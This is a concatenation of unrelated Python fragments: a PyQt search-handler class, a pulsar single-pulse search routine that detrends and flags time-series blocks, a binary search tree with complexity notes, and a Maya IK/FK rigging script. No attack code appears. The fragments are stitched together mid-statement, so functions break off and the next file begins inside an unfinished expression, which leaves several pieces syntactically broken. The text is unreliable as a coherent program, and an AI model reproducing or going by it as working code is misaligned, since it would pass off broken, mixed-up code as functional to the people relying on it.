self.tabWidget.addTab(self.propertiesTab, 'Properties')
self.tabWidget.addTab(self.searchTab, 'Filter')
self.tabWidget.addTab(self.layoutTab, 'Layout')
self.tabWidget.addTab(self.saveTab, 'Save')
# Add tooltips
# self.add_tooltips()
return self.tabWidget
class SearchHandler():
def __init__(self, main):
self.main = main
def load_saved_search(self, index):
for s in reversed(self.main.savedSearches):
if index.data() == s[0]:
self.setup_views(['timeline', 'map', 'table'], self.main.sparql.execute_string(s[1]))
self.main.topMenuTabs.setCurrentIndex(2)
return
def add_custom_condition(self):
# Each custom condition consists of groups of 3 widgets
if self.main.searchForm.advancedSearchLayout.count() == 0:
count = 0
else:
count = self.main.searchForm.advancedSearchLayout.count() / 3
# Add to appropriate indexes our new row of widgets
self.main.searchForm.advancedSearchLayout.addWidget(self.generate_field_combo(), count + 1, 1, 1, 2)
self.main.searchForm.advancedSearchLayout.addWidget(self.generate_condition_combo(), count + 1, 2, 1, 3)
self.main.searchForm.advancedSearchLayout.addWidget(QtWidgets.QLineEdit(), count + 1, 4, 1, 2)
# Add auto-completion where appropriate
self.update_auto_complete()
def remove_custom_condition(self):
if self.main.searchForm.advancedSearchLayout.count() > 0:
# Get 3 last items in the layout and remove them
self.main.searchForm.advancedSearchLayout.itemAt(self.main.searchForm.advancedSearchLayout.count()
length in detrendlens
roundN = N/detrendlen * detrendlen
numchunks = roundN / chunklen
# Read in the file
print 'Reading "%s"...'%filenm
timeseries = Num.fromfile(filenm, dtype=Num.float32, count=roundN)
# Split the timeseries into chunks for detrending
numblocks = roundN/detrendlen
timeseries.shape = (numblocks, detrendlen)
stds = Num.zeros(numblocks, dtype=Num.float64)
stds_orig = Num.zeros(numblocks, dtype=Num.float64)
means = Num.zeros(numblocks, dtype=Num.float64)
# de-trend the data one chunk at a time
print ' De-trending the data and computing statistics...'
for ii, chunk in enumerate(timeseries):
if opts.fast: # use median removal instead of detrending (2x speedup)
tmpchunk = chunk.copy()
tmpchunk.sort()
med = tmpchunk[detrendlen/2]
chunk -= med
tmpchunk -= med
elif opts.iter:
# ot,tsig,tmean=plsr.threshold(chunk, 3.0)
tmean,tsig=clean_timeseries(chunk,nabove=10.0,debug=False)
chunk -= tmean
tmpchunk = chunk.copy()
else:
# The detrend calls are the most expensive in the program
timeseries[ii] = scipy.signal.detrend(chunk, type='linear')
tmpchunk = timeseries[ii].copy()
tmpchunk.sort()
# The following gets rid of (hopefully) most of the
# outlying values (i.e. power dropouts and single pulses)
# If you throw out 5% (2.5% at bottom and 2.5% at top)
# of random gaussian deviates, the measured stdev is ~0.871
# of the true stdev. Thus the 1.0/0.871=1.148 correction below.
# The following is roughly .std() since we already removed the median
stds[ii] = Num.sqrt((tmpchunk[detrendlen/40:-detrendlen/40]**2.0).sum() /
(0.95*detrendlen))
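# Quick sanity check of the 0.871 figure quoted above (illustrative only, not
# part of the pipeline): trimming 2.5% from each tail of a standard normal
# sample and renormalising by 0.95*N reproduces it.
#
#   import numpy as np
#   x = np.sort(np.random.randn(1000000))
#   trimmed = x[len(x)/40:-len(x)/40]                     # drop 2.5% per tail
#   print np.sqrt((trimmed**2.0).sum() / (0.95*len(x)))   # ~0.871 -> 1/0.871 ~ 1.148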
if opts.iter:
means[ii] = tmean
stds_orig[ii] = tsig
else:
means[ii]=0.0
stds_orig[ii] = stds[ii]
if opts.noflag:
median_stds = Num.nanmedian(stds_orig)
std_stds = hist_sigma(stds_orig) # stddev of stddevs of chunks
lo_std = max(median_stds - 3.1*std_stds, 0)
hi_std = median_stds + 10.0*std_stds
all_bad = Num.where((stds_orig <= lo_std) | (stds_orig > hi_std))[0]
lo_bad = Num.where(stds_orig <= lo_std)[0]
bad_blocks=all_bad
# bad_blocks=lo_bad
bad_blocks=flag_last_chunk(bad_blocks, detrendlen, chunklen)
else:
# Determine a list of "bad" chunks. We will not search these.
# LGS: If --noflag option is given, will only ignore blocks with low std
# (this nicely flags padding at end of time series)
# Otherwise it will flag both anomalously high and low blocks (default)
# Blocks with anomalously high or low stds will have their std replaced
# with the median value
stds *= 1.148
# sort the standard deviations and separate those with
# very low or very high values
sort_stds = stds.copy()
sort_stds.sort()
# identify the differences with the largest values (this
# will split off the chunks with very low and very high stds)
locut = (sort_stds[1:numblocks/2+1] -
sort_stds[:numblocks/2]).argmax() + 1
hicut = (sort_stds[numblocks/2+1:] -
sort_stds[numblocks/2:-1]).argmax() + numblocks/2 - 2
std_stds = scipy.std(sort_stds[locut:hicut])
median_stds = sort_stds[(locut+hicut)/2]
lo_std = median_stds - 4.0 * std_stds
hi_std = median_stds + 4.0 * std_stds
bad_blocks = Num.nonzero((stds < lo_std) | (stds > hi_std))[0]
print " pseudo-median block standard deviation = %.2f" % (median_stds)
print " identified %d bad blocks out of %d (i.e. %.2f%%)" % \
(len(bad_blocks), len(stds),
100.0*float(len(bad_blocks))/float(len(stds)))
print " High and low stds: %.2f %.2f" % (hi_std, lo_std)
print " Downsample factor: %d " % dsfact
print " Now searching..."
print bad_blocks
stds[bad_blocks] = median_stds
# Now normalize all of the data and reshape it to 1-D
if opts.iter:
timeseries /= stds_orig[:,Num.newaxis]
else:
timeseries /= stds[:,Num.newaxis]
timeseries.shape = (roundN,)
# And set the data in the bad blocks to zeros
# Even though we don't search these parts, it is important
# because of the overlaps for the convolutions
for bad_block in bad_blocks:
loind, hiind = bad_block*detrendlen, (bad_block+1)*detrendlen
timeseries[loind:hiind] = 0.0
# Convert to a set for faster lookups below
bad_blocks = set(bad_blocks)
# Step through the data
dm_candlist = []
if opts.doclust: cand_clust = []
for chunknum in range(numchunks):
loind = chunknum*chunklen-overlap
hiind = (chunknum+1)*chunklen+overlap
# Take care of beginning and end of file overlap issues
if (chunknum==0): # Beginning of file
chunk = Num.zeros(worklen, dtype=Num.float32)
chunk[overlap:] = timeseries[loind+overlap:hiind]
elif (chunknum==numchunks-1): # end of the timeseries
chunk = Num.zeros(worklen, dtype=Num.float32)
chunk[:-overlap] = timeseries[loind:hiind-overlap]
else:
chunk = timeseries[loind:hiind]
# Make a set with the current block numbers
lowblock = blocks_per_chunk * chunknum
currentblocks = set(Num.arange(blocks_per_chunk) + lowblock)
localgoodblocks = Num.asarray(list(currentblocks -
bad_blocks)) - lowblock
# Search this chunk if it is not all bad
if len(localgoodblocks):
# This is the good part of the data (end effects removed)
goodchunk = chunk[overlap:-overlap]
# need to pass blocks/chunklen, localgoodblocks
# dm_candlist, dt, opts.threshold to cython routine
# Search non-downsampled data first
# NOTE: these nonzero() calls are some of the most
# expensive calls in the program. Best bet would
# probably be to simply iterate over the goodchunk
# in C and append to the candlist there.
hibins = Num.flatnonzero(goodchunk>opts.threshold)
hivals = goodchunk[hibins]
hibloc = Num.copy(hibins)
hibins += chunknum * chunklen
hiblocks = hibins/detrendlen
# Add the candidates (which are sorted by bin)
for bin, val, block in zip(hibins, hivals, hiblocks):
if block not in bad_blocks:
time = bin * dt
dm_candlist.append(candidate(info.DM, val, time, bin, 1, \
block, stds_orig[block], means[block]))
#Perform cluster algorithm
if opts.doclust and len(hibloc) != 0:
nsamp,smax,amax,smean,amean,wgp,sctr=plsr.cluster(goodchunk, hibloc, nbin=opts.maxgap)
amean=Num.sqrt(nsamp)*amean
smax += chunknum*chunklen
smean += chunknum*chunklen
sctr += chunknum*chunklen
tmax,tmean,tctr = smax*dt, smean*dt, sctr*dt
for ii in range(len(nsamp)):
tmpblk=int(sctr[ii])/detrendlen
if tmpblk in bad_blocks: continue
cand_clust.append(clust_cand(info.DM, amax[ii], tmax[ii], smax[ii],\
nsamp[ii], tmpblk, stds_orig[tmpblk], means[tmpblk], amean[ii], \
tmean[ii], smean[ii], tctr[ii], sctr[ii], wgp[ii]))
# Prepare our data for the convolution
if useffts: fftd_chunk = rfft(chunk, -1)
# Now do the downsampling...
for ii, downfact in enumerate(downfacts):
if useffts:
# Note: FFT convolution is faster for _all_ downfacts, even 2
goodchunk = fft_convolve(fftd_chunk, fftd_kerns[ii],
overlap, -overlap)
else:
# The normalization of this kernel keeps the post-smoothing RMS = 1
kernel = Num.ones(downfact, dtype=Num.float32) / \
Num.sqrt(downfact)
smoothed_chunk = scipy.signal.convolve(chunk, kernel, 1)
goodchunk = smoothed_chunk[overlap:-overlap]
#Calculate a cleaned std dev of the convolved timeseries
#Note: sig=4.0 -> prob. of 1 in ~16000
loc_std=clean_stddev(goodchunk, 4.0, verbose=False)
if loc_std==0.0: loc_std=1000.0
goodchunk/=loc_std
hibins = Num.flatnonzero(goodchunk>opts.threshold)
hivals = goodchunk[hibins]
hibins += chunknum * chunklen
hiblocks = hibins/detrendlen
hibtmp = hibins - chunknum*chunklen
hibins = hibins.tolist()
hivals = hivals.tolist()
hibtmp = hibtmp.tolist()
# Now walk through the new candidates and remove those
# that are not the highest but are within downfact/2
# bins of a higher signal pulse
## hibins, hivals = prune_related1(hibins, hivals, downfact)
hibins, hivals = prune_related3(goodchunk, hibtmp, downfact)
hibins += chunknum*chunklen
hiblocks = Num.array(hibins)/detrendlen
hiblocks = hiblocks.astype('int')
# Insert the new candidates into the candlist, but
# keep it sorted...
for bin, val, block in zip(hibins, hivals, hiblocks):
if block not in bad_blocks:
time=bin * dt
bisect.insort(dm_candlist,
candidate(info.DM, val, time, bin, downfact, \
block, stds_orig[block], means[block]))
# Now walk through the dm_candlist and remove the ones that
# are within the downsample proximity of a higher
# signal-to-noise pulse
dm_candlist = prune_related2(dm_candlist, downfacts)
print " Found %d pulse candidates"%len(dm_candlist)
# Get rid of those near padding regions
if info.breaks: prune_border_cases(dm_candlist, offregions)
# Write the pulses to an ASCII output file
if len(dm_candlist):
#dm_candlist.sort(cmp_sigma)
outfile.write("# DM Sigma Time (s) Sample Downfact Block RMS Mean\n")
for cand in dm_candlist:
cand.bin=cand.bin*dsfact
outfile.write(str(cand))
outfile.close()
#Write out cluster results
if opts.doclust and len(cand_clust):
outclust.write("# DM SNRmean TimeCtr SampNumCtr Width "+ \
"Block RMS Mean SNRMax TimeMax " + \
"SampNumMax TimeMean SampNumMean NumSamp\n")
for cand in cand_clust:
cand.bin*=dsfact
cand.bin_mean*=dsfact
cand.bin_ctr*=dsfact
outclust.write(str(cand))
if opts.doclust: outclust.close()
# Add these candidates to the overall candidate list
for cand in dm_candlist:
candlist.append(cand)
num_v_DMstr[DMstr] = len(dm_candlist)
if (opts.makeplot):
# Step through the candidates to make a SNR list
DMs.sort()
snrs = []
for cand in candlist:
snrs.append(cand.sigma)
if snrs:
maxsnr = max(int(max(snrs)), int(opts.threshold)) + 3
else:
maxsnr = int(opts.threshold) + 3
# Generate the SNR histogram
snrs = Num.asarray(snrs)
(num_v_snr, lo_snr, d_snr, num_out_of_range) = \
scipy.stats.histogram(snrs,
int(maxsnr-opts.threshold+1),
[opts.threshold, maxsnr])
snrs = Num.arange(maxsnr-opts.threshold+1, dtype=Num.float64) * d_snr \
+ lo_snr + 0.5*d_snr
num_v_snr = num_v_snr.astype(Num.float32)
num_v_snr[num_v_snr==0.0] = 0.001
# Generate the DM histogram
num_v_DM = Num.zeros(len(DMs))
for ii, DM in enumerate(DMs):
num_v_DM[ii] = num_v_DMstr["%.2f"%DM]
DMs = Num.asarray(DMs)
# open the plot device
short_filenmbase = filenmbase[:filenmbase.find("_DM")]
if opts.T_end > obstime:
opts.T_end = obstime
if pgplot_device:
ppgplot.pgopen(pgplot_device)
else:
if (opts.T_start >
"""
@author: <NAME>
@since: 21/08/2016
@modified:
A BST implementation supporting
- insert = O(h)
- remove = O(h)
- look up = O(h)
- get min = O(h)
- get max = O(h)
assuming left < key <= right
Time Complexity:
- best case, avg case = O(log n), since inserting, removing, looking up and finding min/max only traverse the tree
down a single root-to-leaf path (removing a node with two children also finds the min of its right subtree and rewires pointers)
- worst case = O(n) when each item inserted is greater than the last, which leads to a long chain
Height = O(h)
- worst = O(n), just a big chain on one side
- best, avg = O(log n)
expected depth of any individual node is O(log n)
Space Complexity: O(n), where n is the number of nodes
Traversals:
- pre-order = root, Left, Right
- in-order = Left, root, Right
- post-order = Left, Right, root
level-order (level first) = BFS
traversal example:
F
/ \
B G
/ \ \
A D I
/ \ /
C E H
pre-order (r,L,R) = F, B, A, D, C, E, G, I, H
in-order (L,r,R) = A, B, C, D, E, F, G, H, I
post-order (L,R,r) = A, C, E, D, B, H, I, G, F
Note: Better than linear time, worse than hashtables
- we use BST to get better performance than O(n) (linked lists etc can also do O(n)
- but in the worst case they are also O(n) --> then comes AVL trees =]
"""
from algorithms_datastructures.trees.tree_node import TreeNode
class BinarySearchTree:
def __init__(self):
self.root = None
def is_empty(self):
return self.root is None
def insert(self, key):
"""specify the value of the key for the new node
will create node for you and call auxiliary function to recursively find where the
new node belongs"""
new_node = TreeNode(key)
if self.is_empty(): # make root point to the head of the tree (new node)
self.root = new_node
else:
self._insert_aux(self.root, new_node)
def _insert_aux(self, current_node, new_node):
if new_node.key < current_node.key: # check if new node lies to the left
if current_node.left is not None: # if None, we found where to put it
self._insert_aux(current_node.left, new_node) # else recursively find where to put
else:
current_node.left = new_node
else: # new node lies to the right
if current_node.right is not None:
self._insert_aux(current_node.right, new_node)
else:
current_node.right = new_node
def get_min(self, start_node=None):
if not self.is_empty():
if start_node:
current_node = start_node # can specify a start node to search on a particular part of the tree
else:
current_node = self.root
while current_node.left is not None:
current_node = current_node.left
return current_node
else:
raise Exception
def get_max(self, start_node=None):
if not self.is_empty():
if start_node:
current_node = start_node
else:
current_node = self.root
while current_node.right is not None:
current_node = current_node.right
return current_node
else:
raise Exception
def look_up(self, key):
"""Recursively searches if key is in the tree, returns False if not"""
if self.is_empty():
raise Exception
return self._look_up_aux_rec(self.root, key)
def _look_up_aux_rec(self, current_node, key, parent=None): # returns parent as well now; less intuitive than the iterative version
if key < current_node.key:
if current_node.left is not None:
parent = current_node
return self._look_up_aux_rec(current_node.left, key, parent)
else:
return False, parent
elif key > current_node.key:
if current_node.right is not None:
parent = current_node
return self._look_up_aux_rec(current_node.right, key, parent)
else:
return False, parent
else: # current_node.key = key
return current_node, parent
def _look_up_aux_itr(self, key):
"""Alternative look up that returns the parent of the
node (if the node is in the tree) as well"""
if self.is_empty():
raise Exception
current_node = self.root # start at root with parent = None
parent = None
while current_node is not None:
if key < current_node.key: # search left
if current_node.left is not None: # iff left is not None
parent = current_node # update parent node to current node
current_node = current_node.left # update current node to the left link
else:
raise Exception ('Key not in tree, key: ' + str(key))
#return False, parent # left is None, item not found, return False, parent
elif key > current_node.key: # search right
if current_node.right is not None: # iff right is not None
parent = current_node # update parent to current node
current_node = current_node.right # update current node to right link
else:
raise Exception ('Key not in tree, key: ' + str(key))
#return False, parent # right is None, item not found, return False, parent
else: # current_node.key == key
return current_node, parent # found, return current node, parent
def remove(self, key):
"""Remove a node with value key from the tree
cases:
1. node is a leaf, just get rid of it (easy)
2. node has 1 child, make child go directly to parent of node, will maintain BST ordering (easy)
3. node has 2 children, harder. Using the BST property, take the left child (grandchild) of the right child
"""
remove_node, parent = self._look_up_aux_rec(self.root, key)
if remove_node: # check for key in tree
self._remove_aux(remove_node, parent)
else: # node to remove not in BST
raise Exception ('node to remove (' + str(key) + ') not in BST')
def _remove_aux(self, remove_node, parent):
"""
removes remove_node
:param remove_node: node to remove
:param parent: parent of node to remove
:return:
"""
# if parent = None, we are trying to remove the root, can be done better but I forgot about boundary cases and
# did this quick fix l0ls
if parent == None:
if self.root.left is None and self.root.right is None:
self.root = None # set to None, we are done
elif self.root.left is not None and self.root.right is None: # 1 child, the left one
self.root = self.root.left # make it point to the left child
elif self.root.left is None and self.root.right is not None: # 1 child, the right one
self.root = self.root.right # make it point to the right child
else: # 2 children
smallest_node_right_subtree = self.get_min(remove_node.right)
remove_node.key = smallest_node_right_subtree.key # copy the value over, then remove the smallest val
parent = remove_node
current = remove_node.right
while current.left is not None: # find parent of smallest_node_right_subtree
parent = current
current = current.left
self._remove_aux(current, parent)
# else we are not looking to remove the root
else:
# case 1: leaf
if remove_node.left is None and remove_node.right is None: # case 1: leaf
if parent.left == remove_node: # to remove just reset parent link
parent.left = None
elif parent.right == remove_node:
parent.right = None
else:
raise Exception ('custom msg here')
# case 2: 1 child # case 2: 1 child
# skip over the node to be removed by assigning the parent pointer to the left/right pointer of removed node
elif remove_node.left is not None and remove_node.right is None: # only has a left child
# need to see if we add it to parent.left or .right
if parent.key > remove_node.key: # parent > so add to .left
parent.left = remove_node.left # parent.left -> (skipped removed) --> removed.left
else: # parent <= so add to .right
parent.right = remove_node.left # parent.right -> (skipped removed) --> removed.right
elif remove_node.left is None and remove_node.right is not None: # only has a right child
# need to see if we add it to parent.left or .right
if parent.key > remove_node.key: # parent > so add to .left
parent.left = remove_node.right
else: # parent <= so add to .right
parent.right = remove_node.right
# case 3: 2 children
elif remove_node.left is not None and remove_node.right is not None: # case 3: 2 children
# find the smallest element in the right subtree and swap that value with node to remove value
# 2 children guarantees there is something in the right subtree so there will be a minimum
# this min will either be the immediate right value or left most value in right subtree
# to find the smallest element we can call get min on the node to remove to search that subtree
smallest_node_right_subtree = self.get_min(remove_node.right)
# swapping this
# repo: ssimbox/ssimbox-rigTools
from ctrlUI_lib import createClav2, createSphere
import maya.cmds as cmds
import maya.OpenMaya as om
from functools import partial
def duplicateChain(*args):
global ogChain
global chainLen
global switcherLoc
global side
global controllerColor
global clavCheckbox
global rigGrp, ctrlGrp
ogRootchain = cmds.ls(sl = True, type = "joint")[0]
ogChain = cmds.listRelatives(ogRootchain, ad = True, type = "joint")
ogChain.append(ogRootchain)
ogChain.reverse()
side = ogRootchain[0:2]
# Initialize input from UI
scaleController = cmds.intField(scaleField_UI, q=1, v=1)
blendCheckbox = cmds.checkBox(blendCheckbox_UI, q=1, v=1)
constraintCheckBox = cmds.checkBox(constraintCheckBox_UI, q=1, v=1)
chainMenu = cmds.optionMenu("chainMenu_UI", q=1, v=1)
clavCheckbox = cmds.checkBox(clavCheckbox_UI, q=1, v=0)
if side == "l_": controllerColor = rgb=(0, 0, 255)
elif side == "r_": controllerColor = rgb=(255, 0, 0)
if chainMenu == "Leg": chainLen = 5
else: #this is totally unscalable but for now it's ok
chainLen = 3
#suffix for the new chains
newJointList = ["_ik", "_fk", "_scale"]
for newJoint in newJointList:
for i in range(chainLen):
if blendCheckbox == 0 and constraintCheckBox == 0:
cmds.error("pls, select one relation type")
break
newJointName = ogChain[i] + newJoint
#create a joint, copy their position and freeze transform
cmds.joint(n = newJointName)
cmds.matchTransform(newJointName, ogChain[i])
cmds.makeIdentity(newJointName, a = 1, t = 0, r = 1, s = 0)
#deselect to make the two different hierarchies
cmds.select(cl = 1)
cmds.parent((ogChain[0] + "_ik"), world = True)
cmds.setAttr(ogChain[0] + "_ik.visibility", 0)
cmds.setAttr(ogChain[0] + "_fk.visibility", 0)
# Create a locator used for switching IK/FK mode and snap it between two joints
switcherLoc = cmds.spaceLocator(n=side + chainMenu + "_ikfk_Switch")
switcherLocGrp = cmds.group(em=1, n=switcherLoc[0] + "_grp")
cmds.color(switcherLoc, rgb=(255, 255, 0)) #yellow
cmds.delete(cmds.pointConstraint(switcherLoc, switcherLocGrp))
cmds.parent(switcherLoc, switcherLocGrp)
cmds.delete(cmds.pointConstraint(ogChain[1], ogChain[2], switcherLocGrp))
cmds.addAttr(switcherLoc, ln="FKIK_Mode", at="short", min=0, max=1, k=1, r=1)
cmds.move(0,0,-12, switcherLocGrp, r=1) # TODO: derive this offset from the joint positions instead of hardcoding it
cmds.parentConstraint(ogChain[1], switcherLocGrp, mo=1)
#remove .t, .r, .s and .v from the channelbox
for coord in ["X", "Y", "Z"]:
cmds.setAttr(switcherLoc[0] + ".translate" + coord, k=0, l=1)
cmds.setAttr(switcherLoc[0] + ".rotate" + coord, k=0, l=1)
cmds.setAttr(switcherLoc[0] + ".scale" + coord, k=0, l=1)
cmds.setAttr(switcherLoc[0] + ".visibility", k=0, l=1)
# Create hierarchy groups
rigGrp = cmds.group(em=1, n= side + chainMenu + "_rig_grp")
ctrlGrp = cmds.group(em=1, n= side + chainMenu + "_ctrl_grp")
cmds.delete(cmds.parentConstraint(ogChain[0], rigGrp))
cmds.delete(cmds.parentConstraint(ogChain[0], ctrlGrp))
cmds.parent(ctrlGrp, rigGrp)
# Execute
if blendCheckbox == 1:
blendNodeFunc(scaleController, chainMenu)
if constraintCheckBox == 1:
constraintFunc(scaleController, chainMenu)
if clavCheckbox == 1:
clavSel(scaleController)
else:
cmds.parent(ogChain[0] + "_ik", ogChain[0] + "_fk", ctrlGrp)
cmds.parent(ogChain[0] + "_fk_anim_grp", ctrlGrp)
cmds.parent(switcherLocGrp, rigGrp)
def clavSel(scaleClav):
# Select clavicle Joint moving up and put it at the top of the chain
clavJoint = cmds.pickWalk(ogChain[0], d="up")[0]
#ogChain.insert(0, clavJoint)
clavController = createClav2(clavJoint + "_anim") # Import coordinates from ctrlUI_lib
cmds.delete(cmds.pointConstraint(clavJoint, clavController))
# Create offset group, FDH and move up
clavControllerGrp = cmds.group(n=clavController + "_grp", em=1)
cmds.delete(cmds.parentConstraint(clavJoint, clavControllerGrp))
cmds.parent(clavController, clavControllerGrp)
fixedScale = scaleClav/4
cmds.scale(fixedScale, fixedScale, fixedScale, clavController)
cmds.makeIdentity(clavController, a=1)
cmds.move(0,10,0, clavControllerGrp, ws=1, r=1)
cmds.color(clavController, rgb=controllerColor)
# Move pivots on clavicle joint
piv = cmds.xform(clavJoint, q=True, ws=True, t=True)
cmds.xform(clavController, ws=True, piv=piv)
cmds.xform(clavControllerGrp, ws=True, piv=piv)
cmds.orientConstraint(clavController, clavJoint)
# Parent ik and fk chain under clavicle controller
cmds.parent((ogChain[0]+"_fk_anim_grp"),(ogChain[0] + "_ik"), (ogChain[0] + "_fk"), clavController)
cmds.parent(clavControllerGrp, ctrlGrp)
def visCheck(vis):
if vis == "Arm":
asd = True
if vis == "Leg":
asd = False
cmds.checkBox(clavCheckbox_UI, e=1, vis=asd, v=asd)
# Buttons +1 and +3
count = 0
def addOneUnit(*args):
global count
count = count + 1
cmds.intField(scaleField_UI, v=1+count, e=1)
def addThreeUnit(*args):
global count
count = count + 3
cmds.intField(scaleField_UI, v=1+count, e=1)
def blendNodeFunc(scaleController, selectChain):
# Create some blendColors node with the same name of the joint
for x in range(chainLen):
blendColorsNode = cmds.createNode("blendColors", n = ogChain[x] + "_blend")
# Connect FK and IK chains into blendColors channels and then connect the output to the original joint chain
cmds.connectAttr((ogChain[x] + "_ik.rotate"), blendColorsNode + ".color1")
cmds.connectAttr((ogChain[x] + "_fk.rotate"), blendColorsNode + ".color2")
cmds.connectAttr((blendColorsNode + ".output"), (ogChain[x] + ".rotate" ))
cmds.connectAttr(switcherLoc[0]+".FKIK_Mode", blendColorsNode + ".blender")
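# Added note: a blendColors node outputs color1 when blender is 1, so FKIK_Mode = 1
# drives the joints from the _ik chain and FKIK_Mode = 0 drives them from the _fk chain.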
ikChainBuild(scaleController, selectChain)
fkControllerCreator(scaleController, selectChain)
def constraintFunc(scaleController, selectChain):
# Create some blendColors node with the same name of the joint
for x in range(chainLen):
# Setup orient constraints
cmds.parentConstraint((ogChain[x] + "_ik"), ogChain[x])
cmds.parentConstraint((ogChain[x] + "_fk"), ogChain[x])
# Setup SDK naming convention
sdkDriver = switcherLoc[0] + ".FKIK_Mode"
ikSdkDriven = ogChain[x] + "_parentConstraint1." + ogChain[x] + "_ikW0"
fkSdkDriven = ogChain[x] + "_parentConstraint1." + ogChain[x] + "_fkW1"
# Setup SDK
cmds.setAttr(sdkDriver, 0)
cmds.setDrivenKeyframe(ikSdkDriven, cd=sdkDriver, v=0, dv=0)
cmds.setDrivenKeyframe(fkSdkDriven, cd=sdkDriver, v=1, dv=0)
cmds.setAttr(sdkDriver, 1)
cmds.setDrivenKeyframe(ikSdkDriven, cd=sdkDriver, v=1, dv=1)
cmds.setDrivenKeyframe(fkSdkDriven, cd=sdkDriver, v=0, dv=1)
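# Added note on the net effect of these keys: FKIK_Mode = 0 gives the _fk constraint
# full weight (FK mode) and FKIK_Mode = 1 gives the _ik constraint full weight (IK mode),
# matching the blendColors setup above.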
ikChainBuild(scaleController, selectChain)
fkControllerCreator(scaleController, selectChain)
def fkControllerCreator(fkSize, legOrArm):
orientController = cmds.optionMenu("UI_orientControllerMenu", q=1, v=1)
# Create controllers and group offsets
# Change rotation, color
for y in range(chainLen):
anim_group = cmds.group(em=1, n=ogChain[y] + "_fk_anim_grp")
fk_controller = cmds.circle(n=ogChain[y] + "_fk_anim")[0] # If not [0] it'll warn some stuff related to Maya underworld
# Set scale
cmds.scale(fkSize, fkSize, fkSize, fk_controller)
cmds.matchTransform(anim_group, ogChain[y])
cmds.delete(cmds.parentConstraint(ogChain[y], fk_controller))
cmds.parent(fk_controller, anim_group)
# Set controller orientation based on second axis
if orientController == "x": cmds.rotate(90,0,0, fk_controller)
if orientController == "y": cmds.rotate(0,90,0, fk_controller)
if orientController == "z": cmds.rotate(0,0,90, fk_controller)
# Freeze transform, delete history and set color
cmds.makeIdentity(fk_controller, a = 1, t = 1, r = 1, s = 0)
cmds.delete(fk_controller, ch = 1)
cmds.color(fk_controller, rgb=controllerColor)
# Set SDK visibility
sdkDriver = switcherLoc[0] + ".FKIK_Mode"
cmds.setAttr(sdkDriver, 1)
cmds.setDrivenKeyframe(ogChain[0] + "_fk_anim_grp.visibility", cd=sdkDriver, v=1, dv=0)
cmds.setAttr(sdkDriver, 0)
cmds.setDrivenKeyframe(ogChain[0] + "_fk_anim_grp.visibility", cd=sdkDriver, v=0, dv=1)
# Lock .t and .s attributes
#for x in ["X", "Y", "Z"]:
#cmds.setAttr(fk_controller + ".translate" + x, k=0, l=1)
#cmds.setAttr(fk_controller + ".scale" + x, k=0, l=1)
# Create ordered hierarchy
for x in reversed(range(chainLen)):
if x == 0:
continue
cmds.parent(ogChain[x] + "_fk_anim_grp", ogChain[x-1] + "_fk_anim")
# Set orientConstraint _anim controllers with _fk hierarchy
for x in range(chainLen):
cmds.parentConstraint(ogChain[x] + "_fk_anim", ogChain[x] + "_fk")
# If leg chain is selected delete toe controller, else not
if legOrArm == "Leg":
if x == (chainLen-1):
cmds.delete(ogChain[chainLen-1] + "_fk_anim_grp")
def ikChainBuild(scaleIK, HandleName):
masterIkHandle = cmds.ikHandle(sj=ogChain[0] + "_ik", ee=ogChain[2] + "_ik", sol="ikRPsolver", n=side + HandleName + "_ikHandle")
cmds.setAttr(masterIkHandle[0] + ".visibility", 0)
if HandleName == "Arm":
#print ("scaleController", scaleField_UI)
armIk(scaleIK, masterIkHandle, HandleName)
else:
#print ("scaleController", scaleField_UI)
legIK(scaleIK, masterIkHandle, HandleName)
def armIk(armIkScale, armikHandle, pvName):
ikHandJoint = cmds.joint(n=side + "hand_ik")
cmds.delete(cmds.parentConstraint(ogChain[2] + "_ik", ikHandJoint))
cmds.makeIdentity(ikHandJoint, a = 1, t = 1, r = 1, s = 0)
if side == "l_":
cmds.move(10,0,0, ikHandJoint, r=1, os=1)
else:
cmds.move(-10,0,0, ikHandJoint, r=1, os=1)
cmds.parent(ikHandJoint, ogChain[2] + "_ik")
handikHandle = cmds.ikHandle(sj=ogChain[2] + "_ik", ee=ikHandJoint, n=side + "hand_ikHandle", sol="ikSCsolver")
cmds.parent(handikHandle[0], armikHandle[0])
#create IK controller ---> CUBE
crvIkCube = cmds.curve(d=1, p=[(-0.5, 0.5, -0.5), (0.5, 0.5, -0.5), (0.5, 0.5, 0.5),
(-0.5, 0.5, 0.5), (-0.5, -0.5, 0.5), (-0.5, -0.5, -0.5),
(-0.5, 0.5, -0.5), (-0.5, 0.5, 0.5), (-0.5, -0.5, 0.5),
(0.5, -0.5, 0.5), (0.5, 0.5, 0.5), (0.5, 0.5, -0.5),
(0.5, -0.5, -0.5), (0.5, -0.5, 0.5), (0.5, -0.5, -0.5), (-0.5, -0.5, -0.5)],
k=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15], n=side + "hand_ik_anim" )
# Rename shape node
shapeList = cmds.listRelatives(crvIkCube, s = True)
cmds.rename(shapeList, crvIkCube + "Shape")
crvIkCubeGrp = cmds.group(n=crvIkCube + "_grp")
cmds.delete(cmds.parentConstraint(ogChain[2] + "_ik", crvIkCubeGrp))
cmds.color(crvIkCube, rgb=controllerColor)
cmds.scale(armIkScale, armIkScale, armIkScale, crvIkCubeGrp)
cmds.parent(armikHandle[0], crvIkCube)
pvController = createSphere(nome= side+pvName+"_PV")
findPoleVector(loc=pvController, targetHandle=armikHandle[0])
cmds.addAttr(pvController, at="enum", enumName = "------", ln="Attributes", k=1, r=1)
cmds.addAttr(pvController, ln="Follow", k=1, r=1, min=0, max=1)
cmds.addAttr(pvController, ln="Follow_Clav_Hand", k=1, r=1, min=0, max=1, dv=0.5)
# Parent ikController and PV under _rig_GRP
cmds.parent(crvIkCubeGrp, pvController + "_grp" ,rigGrp)
#set SDK visibility
sdkDriver = switcherLoc[0] + ".FKIK_Mode"
cmds.setAttr(sdkDriver, 0)
cmds.setDrivenKeyframe(crvIkCubeGrp + ".visibility", cd=sdkDriver, v=0, dv=0)
cmds.setDrivenKeyframe(pvController + "_grp.visibility", cd=sdkDriver, v=0, dv=0)
cmds.setAttr(sdkDriver, 1)
cmds.setDrivenKeyframe(crvIkCubeGrp + ".visibility", cd=sdkDriver, v=1, dv=1)
cmds.setDrivenKeyframe(pvController + "_grp.visibility", cd=sdkDriver, v=1, dv=1)
def legIK(ikFootScale, legikHandle, pvName):
ballikHandle = cmds.ikHandle(sj=ogChain[2] + "_ik", ee=ogChain[3] + "_ik", sol="ikSCsolver", n=side + "ball_ikHandle")
